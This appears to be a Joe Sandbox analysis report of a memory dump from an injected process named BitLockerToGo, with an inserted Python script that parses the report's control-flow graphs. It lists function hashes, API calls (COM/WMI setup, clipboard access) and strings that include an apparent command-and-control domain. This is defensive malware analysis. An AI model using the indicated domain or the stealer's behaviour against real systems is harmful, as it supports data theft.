• Opcode ID: cc0782fa5bc4575f6715a7bde3449489c57378219f9bf7960f9699414c49ac44
• Instruction ID: f7ea2be89283f713bd0516aaaec10ec30aeb0a5355e630bcd4f8e36aece2a8e2
• Opcode Fuzzy Hash: cc0782fa5bc4575f6715a7bde3449489c57378219f9bf7960f9699414c49ac44
• Instruction Fuzzy Hash: 85E17A75604B419FD328CF29C891B26B7F2FF49310F15892DD5968BBA1D739E442CB44

Control-flow Graph

[Rendered interactively in the original report; the executed/not-executed edge list is omitted. Function 0x40b810-0x40bff6: Windows API calls CoInitializeEx, CoInitializeSecurity; internal calls 0x43b9f0, 0x43e080 (12), 0x437270, 0x40c000, 0x40db90, 0x40c5e0, 0x4365e0, 0x43a780.]

Strings
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID:
• String ID: C6T&$D7E607294FA75EE68FF62E1106C8CCA8$QQ!.$Z.^^$\"Y $sergei-esenin.com
• API String ID: 0-1534639489
• Opcode ID: b8de83478b42807edfbfb77dcae6b9da56dc18adc1b9ec55f59c9e233b6e0b32
• Instruction ID: 1f1654bdb7cbdd608bfaf90879f2b1bfbfdf568bc53ae3b2ddb7df9b58b85f24
• Opcode Fuzzy Hash: b8de83478b42807edfbfb77dcae6b9da56dc18adc1b9ec55f59c9e233b6e0b32
• Instruction Fuzzy Hash: 9912BFB45083409BD3109F15DC907AEBBE1EF96308F148A2EE8D56B392D7798905CF9E

Control-flow Graph

[Rendered interactively in the original report; the executed/not-executed edge list is omitted. Function 0x40cc80-0x40db87: no direct Windows API calls in the graph; internal calls 0x43c6e0, 0x43a780.]

Strings
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID:
• String ID: *M/O$+y-{$5Q}S$6abc$;I+K$C-C/$Y1Y3$[u#w$_=U?$p~$sergei-esenin.com
• API String ID: 0-1859607568
• Opcode ID: 411cfc0b810c803cc16bf6648014cd735b07a8082921f204179fb14c882bfd26
• Instruction ID: fc48a0543df603f45fec8ff12a8c085a20f594a9923345cd7e2eba27ad107f33
• Opcode Fuzzy Hash: 411cfc0b810c803cc16bf6648014cd735b07a8082921f204179fb14c882bfd26
• Instruction Fuzzy Hash: 406296B4508345DFD7249F54D890BAFBBB2FF86710F108A2DE5996B290CB349901CF5A

Strings
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID:
• String ID: #:$:6$p~$sergei-esenin.com$sq
• API String ID: 0-1602847909
• Opcode ID: 2cbd70040ee492767e5e335275005e347472d131d9eee89c99bd12e0c7c94366
• Instruction ID: e326c0b78092f1179307cafdfc488eb50248af47790a0d19bcb8f83c70445e2f
• Opcode Fuzzy Hash: 2cbd70040ee492767e5e335275005e347472d131d9eee89c99bd12e0c7c94366
• Instruction Fuzzy Hash: FE92BAB4608701DFD714CF64D890B6EBBB1FF8A711F148A2CE5966B690CB34A811CF99

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
Strings
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID:
• String ID: (+$A$_jIYC2pQ1pswVVaeyx4n19P1ZvDbEX.5r1GxGZkKCpE-1728848096-0.0.1.1-/api$~
• API String ID: 0-1713775397
• Opcode ID: 7cb605134ac94ffdcf6288be40dd188c96069c587b8b6afe075ddef6a9cd403c
• Instruction ID: 44a5d8f24ed4e4816ddfe326b5df41ea1088b2b54770a45eea7b330fb46f4ede
• Opcode Fuzzy Hash: 7cb605134ac94ffdcf6288be40dd188c96069c587b8b6afe075ddef6a9cd403c
• Instruction Fuzzy Hash: 28E1587410C380DBD315DF18C490A2FBBE1AF95758F188A6EE4D9AB391C339D846CB5A

Control-flow Graph
APIs
• CoCreateInstance.OLE32(00441A50,00000000,00000001,00441A40,00000000), ref: 00436715
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID: CreateInstance
• String ID:
• API String ID: 542301482-0
• Opcode ID: e5a2a0082c67cb5c301fccf9abeaebcbd6283177cfdf17d39ad2cc2ad519dbb3
• Instruction ID: ea9f0b6cca55687af24dae82e070ca9713baacfb2e686af0d95a4beb36605997
• Opcode Fuzzy Hash: e5a2a0082c67cb5c301fccf9abeaebcbd6283177cfdf17d39ad2cc2ad519dbb3
• Instruction Fuzzy Hash: 233169B4110B409BE334CF26C999B53BBF5EB89714F448A1DE5DB4BA80CBB4B4098F95
APIs
• LdrInitializeThunk.NTDLL(0040EF35,?,00000001,?), ref: 0043C82E
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
• Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
• Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
• Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5acfd14c27bde9b74bf5aca11f72f78e1ca5bbfd350eb031bc15054e0debc95a
• Instruction ID: 6a5b91908db97ac0091159e2d275d9b84e4347aafb7fecb6be556b6923d5ccbe
• Opcode Fuzzy Hash: 5acfd14c27bde9b74bf5aca11f72f78e1ca5bbfd350eb031bc15054e0debc95a
• Instruction Fuzzy Hash: 9621C0748042558FDB14CFA8C9906BEBBB1AF06301F24459EC59233391D734BA41CBE9

Control-flow Graph
APIs
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID: Process$CurrentExit
• String ID:
• API String ID: 2333725396-0
• Opcode ID: b203863fcc5dfd2f2068b8a58807d9dee33faf21cb1ad893444914451a0ecebb
• Instruction ID: 4218e29b3bc86311983865424d116f639c7e788c7b42be7a3867dd50df405cf1
• Opcode Fuzzy Hash: b203863fcc5dfd2f2068b8a58807d9dee33faf21cb1ad893444914451a0ecebb
• Instruction Fuzzy Hash: 96F082B061871496CA103B768B0B32E3B546F11348F424E3BFD82711D1DB7C48B6A69F

Control-flow Graph
APIs
• RtlReAllocateHeap.NTDLL(?,00000000,?,00000000), ref: 0043C7B5
Strings
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID: bkC
• API String ID: 1279760036-164674686
• Opcode ID: fc67cc29f5e8b9454afda8e38ad6b9b3aed85a913dfc2044a9caebc309474b4c
• Instruction ID: 57bb3bdb3c83f7f27277d3be29dd4639150ad412d8f3ab5f7e23676a3f5a600c
• Opcode Fuzzy Hash: fc67cc29f5e8b9454afda8e38ad6b9b3aed85a913dfc2044a9caebc309474b4c
• Instruction Fuzzy Hash: 095135BA918161DFCB049FB8ED915AE7B74FF0A305F0504B8D441673A1D7345A02CBE5

Control-flow Graph
APIs
• GetCurrentProcess.KERNEL32 ref: 0043566A
• GetUserDefaultUILanguage.KERNELBASE ref: 0043569D
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID: CurrentDefaultLanguageProcessUser
• String ID:
• API String ID: 4043730634-0
• Opcode ID: e8e69d52529d9b3024fb9fc69b6d92add96fb0e78604761e38fd6f46cc65e290
• Instruction ID: f09ea27b4f4602716aeb15a8b3b72605140b3d9120e4ea613be95b47a89f691f
• Opcode Fuzzy Hash: e8e69d52529d9b3024fb9fc69b6d92add96fb0e78604761e38fd6f46cc65e290
• Instruction Fuzzy Hash: E731A1B59052548FC710EF68E9453AE7FB0EB25309F1449ADD488A7342E7748E98CFA3

Control-flow Graph
APIs
• CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004367E0
• CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,Function_000367F0), ref: 00436801
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID: BlanketProxy
• String ID:
• API String ID: 3890896728-0
• Opcode ID: 1f4c462caab9f6b2ed01f987ea2e79c0f021f0dc3f4c8e4d67c731682aa1e547
• Instruction ID: 85de96fdc2472c7becba0e1e7cde9433106db14601eb3176dfd388c25d5d3e4d
• Opcode Fuzzy Hash: 1f4c462caab9f6b2ed01f987ea2e79c0f021f0dc3f4c8e4d67c731682aa1e547
• Instruction Fuzzy Hash: 84E0FE393D8700BFF2364B50ED17F057665BB0AF02F601564B3867C5E097F176119A48

Control-flow Graph
call 43a6f0 770->782 783 43c790 770->783 784 43c7b0-43c7b5 RtlReAllocateHeap 770->784 785 43c7c7-43c7cd call 43a6f0 770->785 786 43c79b-43c7a6 770->786 787 43c7ea-43c7f1 770->787 788 43c7df-43c7e8 call 43a780 770->788 771->753 771->768 771->769 771->770 771->772 771->773 772->779 772->780 772->783 772->784 772->786 772->787 772->788 773->754 774->753 774->768 774->770 774->772 774->773 774->779 774->780 774->781 774->782 774->783 774->784 774->785 774->786 774->787 774->788 775->776 776->764 793 43c741 779->793 794 43c77c-43c787 779->794 780->786 782->788 784->781 785->782 786->784 788->787 795 43c3d0-43c407 789->795 790->750 801 43c750-43c77a 793->801 794->783 795->790 795->795 801->794 801->801
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 56f2cde8574eee09f3081d6bcea0eee43c20573740af628ce17efc6299b0352e
                                                                                                                                                            • Instruction ID: 1cc2a8c18b6c764ba4a45f6788286f964cfa991a9b2d9288629432a8f761210c
                                                                                                                                                            • Opcode Fuzzy Hash: 56f2cde8574eee09f3081d6bcea0eee43c20573740af628ce17efc6299b0352e
                                                                                                                                                            • Instruction Fuzzy Hash: B691D67A928164DFDB006FB8BC555AE77B4AB0F352F060CB5D491A3261E3384A17CBE4

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 807 43c696-43c6ae 808 43c343-43c358 call 435cd0 807->808 809 43c331-43c33c 807->809 810 43c700-43c702 807->810 811 43c5e7-43c5fa 807->811 812 43c446-43c44f 807->812 813 43c5d5-43c5dd 807->813 814 43c57d-43c58e 807->814 818 43c362-43c36d 808->818 809->808 809->813 817 43c1a2-43c1ad 809->817 809->818 819 43c1c6-43c200 809->819 820 43c1b4-43c1bf 809->820 821 43c468 809->821 824 43c706-43c70d 810->824 811->808 811->810 811->813 811->814 815 43c451 812->815 816 43c456-43c45e 812->816 813->811 814->813 815->816 816->821 817->819 817->820 817->821 818->810 818->813 818->824 825 43c381-43c3c1 818->825 826 43c374-43c37a 818->826 827 43c714-43c71b 818->827 828 43c4af-43c4d4 call 43e080 818->828 829 43c49d-43c4a8 818->829 819->813 819->814 844 43c4e4-43c4fe call 43c840 819->844 845 43c31f-43c32a 819->845 820->808 820->817 820->818 820->819 820->820 820->821 821->829 824->827 830 43c722-43c73f 824->830 831 43c792 824->831 832 43c7c1 824->832 833 43c7d0-43c7d6 call 43a6f0 824->833 834 43c790 824->834 835 43c7b0-43c7b5 RtlReAllocateHeap 824->835 836 43c7c7-43c7cd call 43a6f0 824->836 837 43c79b-43c7a6 824->837 838 43c7ea-43c7f1 824->838 839 43c7df-43c7e8 call 43a780 824->839 841 43c3c3 825->841 842 43c409-43c43f call 43db30 825->842 826->810 826->813 826->824 826->825 826->827 826->828 827->830 827->831 827->834 827->835 827->837 827->838 827->839 828->844 829->810 829->813 829->824 829->827 829->828 829->830 829->831 829->832 829->833 829->834 829->835 829->836 829->837 829->838 829->839 846 43c741 830->846 847 43c77c-43c787 830->847 831->837 833->839 835->832 836->833 837->835 839->838 848 43c3d0-43c407 841->848 842->808 842->809 842->811 842->812 842->813 842->814 842->817 842->818 842->819 842->820 842->821 844->814 845->808 845->809 845->811 845->813 845->814 845->817 845->818 845->819 845->820 
845->821 854 43c750-43c77a 846->854 847->834 848->842 848->848 854->847 854->854
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: beb8109c3086ce93d8e06dcac9815687f02bbed8dc5eedd2f0637c2648827aae
                                                                                                                                                            • Instruction ID: 38727bc09f133ece8f5d57358d2970249bfacc476c6d579fc28860c1907593a6
                                                                                                                                                            • Opcode Fuzzy Hash: beb8109c3086ce93d8e06dcac9815687f02bbed8dc5eedd2f0637c2648827aae
                                                                                                                                                            • Instruction Fuzzy Hash: 617148BA918160DFDB049FB8ED905BE7B74AF0B316F0908F9D49163261D3385A02CBE5

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 870 436728-436768 871 436797-4367b9 SysAllocString 870->871 872 43676a 870->872 874 4367bd-4367bf 871->874 873 436770-436795 872->873 873->871 873->873
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocString
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2525500382-0
                                                                                                                                                            • Opcode ID: d2c6052d94313f16ea65dfe563f55348c8d742d89dbb323326da04f1fcd23508
                                                                                                                                                            • Instruction ID: 5a0618e91a28a85d2f86b60d01bc68a50de2481b0f7dbb12c5016779150b87dc
                                                                                                                                                            • Opcode Fuzzy Hash: d2c6052d94313f16ea65dfe563f55348c8d742d89dbb323326da04f1fcd23508
                                                                                                                                                            • Instruction Fuzzy Hash: B0111570100B819FD370CF29C494A26BBF1FF4A309BA09C1DE1C28B651C776E442CB54

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 875 43a7a2-43a7a9 876 43a812-43a818 RtlFreeHeap 875->876 877 43a7b0-43a7c7 875->877 878 43a810 875->878 879 43a81e-43a823 875->879 876->879 880 43a7c9 877->880 881 43a7fc-43a807 877->881 878->876 882 43a7d0-43a7fa 880->882 881->878 882->881 882->882
                                                                                                                                                            APIs
                                                                                                                                                            • RtlFreeHeap.NTDLL(?,00000000), ref: 0043A818
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FreeHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3298025750-0
                                                                                                                                                            • Opcode ID: 467f385da2c6dae1b4972b3f25f99549e7419152301e6f524d1777dffb42152c
                                                                                                                                                            • Instruction ID: e58a62a467fcc3cf4ca00239bb9c62a929624cff67e618a81d4e951f87d01d60
                                                                                                                                                            • Opcode Fuzzy Hash: 467f385da2c6dae1b4972b3f25f99549e7419152301e6f524d1777dffb42152c
                                                                                                                                                            • Instruction Fuzzy Hash: 29018F38A40248DFEB00CF64D99069DBB36EB86319F64C0D8C445277A5C332AE53CB84
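The control-flow graphs in this report are rendered from a whitespace-separated token list (node id, address range, optional `call <hex>` or imported API name, then `a->b` edges). The parser below is an added example and is not part of the Joe Sandbox report or its IDA plugin; the token format is inferred from the graphs on this page, not from a documented schema, and the two embedded graph strings are copied from the SysAllocString and RtlFreeHeap entries above. It rebuilds each graph, reports entry and exit blocks, loop-closing edges and API call sites, and maps an address from the APIs list (such as `ref: 0043A818`) back to the basic block that contains it, which is the check you want when deciding whether a heap or string API is reached inside a loop.

```python
"""Parse Joe Sandbox control-flow-graph token lists and summarise them.

Format assumed from the graphs in this report (not a documented schema):
  control_flow_graph <id> <start>[-<end>] [call <hex> | <ApiName>]... <a>-><b> ...
Node ids are decimal, addresses are hex, and call annotations follow a
node's address until the next node id or edge token.
"""
import re
from collections import defaultdict

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ADDR_RE = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$")

# Graph data copied from this report (SysAllocString and RtlFreeHeap entries).
SYSALLOCSTRING_CFG = (
    "control_flow_graph 870 436728-436768 871 436797-4367b9 SysAllocString "
    "870->871 872 43676a 870->872 874 4367bd-4367bf 871->874 "
    "873 436770-436795 872->873 873->871 873->873"
)
RTLFREEHEAP_CFG = (
    "control_flow_graph 875 43a7a2-43a7a9 876 43a812-43a818 RtlFreeHeap "
    "875->876 877 43a7b0-43a7c7 875->877 878 43a7b0 875->878 "
    "879 43a81e-43a823 875->879 876->879 880 43a7c9 877->880 "
    "881 43a7fc-43a807 877->881 878->876 882 43a7d0-43a7fa 880->882 "
    "881->878 882->881 882->882"
).replace("878 43a7b0 ", "878 43a810 ")  # block 878 is the single-byte block 43a810


def parse_cfg(text):
    """Return (blocks, edges); blocks maps node id -> {start, end, calls}."""
    blocks, edges = {}, []
    current, expect_addr, expect_target = None, False, False
    for tok in text.split():
        if tok == "control_flow_graph":
            continue
        if expect_addr:  # the token right after a node id is its address range
            if not ADDR_RE.match(tok):
                raise ValueError(f"bad address {tok!r} for node {current}")
            start, _, end = tok.partition("-")
            blocks[current] = {"start": int(start, 16),
                               "end": int(end or start, 16), "calls": []}
            expect_addr = False
        elif expect_target:  # hex target that follows a "call" token
            blocks[current]["calls"].append("sub_" + tok)
            expect_target = False
        elif EDGE_RE.match(tok):
            src, dst = EDGE_RE.match(tok).groups()
            edges.append((int(src), int(dst)))
        elif tok.isdigit():
            current, expect_addr = int(tok), True
        elif tok == "call":
            expect_target = True
        else:  # any other token is an imported API name on the current block
            blocks[current]["calls"].append(tok)
    return blocks, edges


def entry_blocks(blocks, edges):
    """Blocks with no predecessor (normally just the function start)."""
    targets = {dst for _, dst in edges}
    return sorted(n for n in blocks if n not in targets)


def exit_blocks(blocks, edges):
    """Blocks with no successor (returns or jumps out of the function)."""
    sources = {src for src, _ in edges}
    return sorted(n for n in blocks if n not in sources)


def back_edges(blocks, edges):
    """Loop-closing edges: DFS from each entry; an edge to a node still on
    the DFS stack closes a loop (self-loops such as 873->873 included)."""
    succ = defaultdict(list)
    for src, dst in edges:
        succ[src].append(dst)
    found, visited = set(), set()

    def dfs(node, stack):
        visited.add(node)
        stack.add(node)
        for nxt in succ[node]:
            if nxt in stack:
                found.add((node, nxt))
            elif nxt not in visited:
                dfs(nxt, stack)
        stack.remove(node)

    for entry in entry_blocks(blocks, edges) or sorted(blocks):
        if entry not in visited:
            dfs(entry, set())
    return sorted(found)


def api_call_sites(blocks):
    """Map callee name -> start addresses of the blocks that call it."""
    sites = defaultdict(list)
    for node in sorted(blocks):
        for callee in blocks[node]["calls"]:
            sites[callee].append(blocks[node]["start"])
    return dict(sites)


def block_containing(blocks, addr):
    """Node id whose range covers addr, e.g. the APIs list's 'ref: 0043A818'."""
    for node, blk in blocks.items():
        if blk["start"] <= addr <= blk["end"]:
            return node
    return None


def summarize(text):
    blocks, edges = parse_cfg(text)
    return {"blocks": len(blocks), "edges": len(edges),
            "entries": entry_blocks(blocks, edges),
            "exits": exit_blocks(blocks, edges),
            "loops": back_edges(blocks, edges),
            "calls": api_call_sites(blocks)}


if __name__ == "__main__":
    for name, cfg in (("SysAllocString", SYSALLOCSTRING_CFG),
                      ("RtlFreeHeap", RTLFREEHEAP_CFG)):
        print(name, summarize(cfg))
```

Run stand-alone it prints one summary per graph. On a complete report, feed each `control_flow_graph ...` string to `summarize` in turn and filter on `calls` to list which functions reach the heap, clipboard or WMI APIs flagged in the signatures; `block_containing` ties each `ref:` address in an APIs list to its basic block, and `back_edges` tells you whether that block sits inside a loop.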
                                                                                                                                                            APIs
                                                                                                                                                            • RtlAllocateHeap.NTDLL(?,00000000), ref: 0043A76B
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                            • Opcode ID: 78e65d7e54fbb97d493f955b41e24730cb33fc9e0624615bae75e3f863140746
                                                                                                                                                            • Instruction ID: 97f73e13ff0ba3024f09bf4723230358ed07b21731cc37c5d5ce43716dcac73c
                                                                                                                                                            • Opcode Fuzzy Hash: 78e65d7e54fbb97d493f955b41e24730cb33fc9e0624615bae75e3f863140746
                                                                                                                                                            • Instruction Fuzzy Hash: 8AB09274100A00ABEA155B14DC25F207A25EB44709FA008A8A815854B2C6269836D988
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: MetricsSystem
                                                                                                                                                            • String ID: eB$ZB$aB$ $&`B$&dB$)YB$:fB$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$MdB$[aB$beB$y[B$YB$^B$`B
                                                                                                                                                            • API String ID: 4116985748-1301689713
                                                                                                                                                            • Opcode ID: ed2d5ffeca8568e32c327981134a743846ad8985eda272e08d3c848a72605f9e
                                                                                                                                                            • Instruction ID: 2be8b3321d8ebc35c174cfe65313f19d7b7ab85f5ee63cbee2d1089338e9952b
                                                                                                                                                            • Opcode Fuzzy Hash: ed2d5ffeca8568e32c327981134a743846ad8985eda272e08d3c848a72605f9e
                                                                                                                                                            • Instruction Fuzzy Hash: 71C17EB000A3849FE770DF15E54878BBBE4BB86348F91891EE4994B354D7B89548CF8B
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: "A1C$*m(o$1Y6[$4`[b$4i<k$56$9M'O$9]-_$:9$;U0W$<I/K$<a[c$=E5G$@qFs$EuEw$IyK{$O!U#$PA$Q1U3$WP$WeQg$]5X7$]i)k$_-]/$h1i?$k>h0$o=K?$x:m<$y5n3$uw
                                                                                                                                                            • API String ID: 0-2269972215
                                                                                                                                                            • Opcode ID: 779dedc07c5897f8f241aca86a09de035cd84d31b5fffd4dc929a5109f8191e5
                                                                                                                                                            • Instruction ID: d94ce0ecc20038e688a02a3dea8145f2d16f1f88ab05816ea4259b122c1fea78
                                                                                                                                                            • Opcode Fuzzy Hash: 779dedc07c5897f8f241aca86a09de035cd84d31b5fffd4dc929a5109f8191e5
                                                                                                                                                            • Instruction Fuzzy Hash: A2821CB410C381CBE334CF25D580B9BBBE1BB86304F208A2DE5ED9B251DB748446CB96
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: "A1C$*m(o$1Y6[$4`[b$4i<k$56$9M'O$9]-_$:9$;U0W$<I/K$<a[c$=E5G$@qFs$EuEw$IyK{$O!U#$PA$Q1U3$WP$WeQg$]5X7$]i)k$_-]/$h1i?$k>h0$o=K?$x:m<$y5n3$uw
                                                                                                                                                            • API String ID: 0-2269972215
                                                                                                                                                            • Opcode ID: 03a559ddfeca7b8391674ecb4c394752d2d459566a40de705f58b8f5d10fe77b
                                                                                                                                                            • Instruction ID: 540a42f5b2c8655fc7ab95859f4cc758c6e179cb56acad334a16f9351a1cbdc7
                                                                                                                                                            • Opcode Fuzzy Hash: 03a559ddfeca7b8391674ecb4c394752d2d459566a40de705f58b8f5d10fe77b
                                                                                                                                                            • Instruction Fuzzy Hash: 64820AB410C381CBE334CF25D590B9BBBE1BB86304F608A2DE5E99B255DB748446CF96
Strings
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID:
• String ID: %%,?$.W$7$3-)$3zx$7<0?$II$]H$_Z$xHx~$x|}{$nml
• API String ID: 0-2043650400
Strings
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID:
• String ID: .$.$0$[$false$null$true${
• API String ID: 0-1639024219
Strings
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID:
• String ID: $F0l$0 :b$TW{O$X\\h
• API String ID: 0-3330333084
APIs
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID: Clipboard$CloseDataLongOpenWindow
• String ID:
• API String ID: 1647500905-0
Strings
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
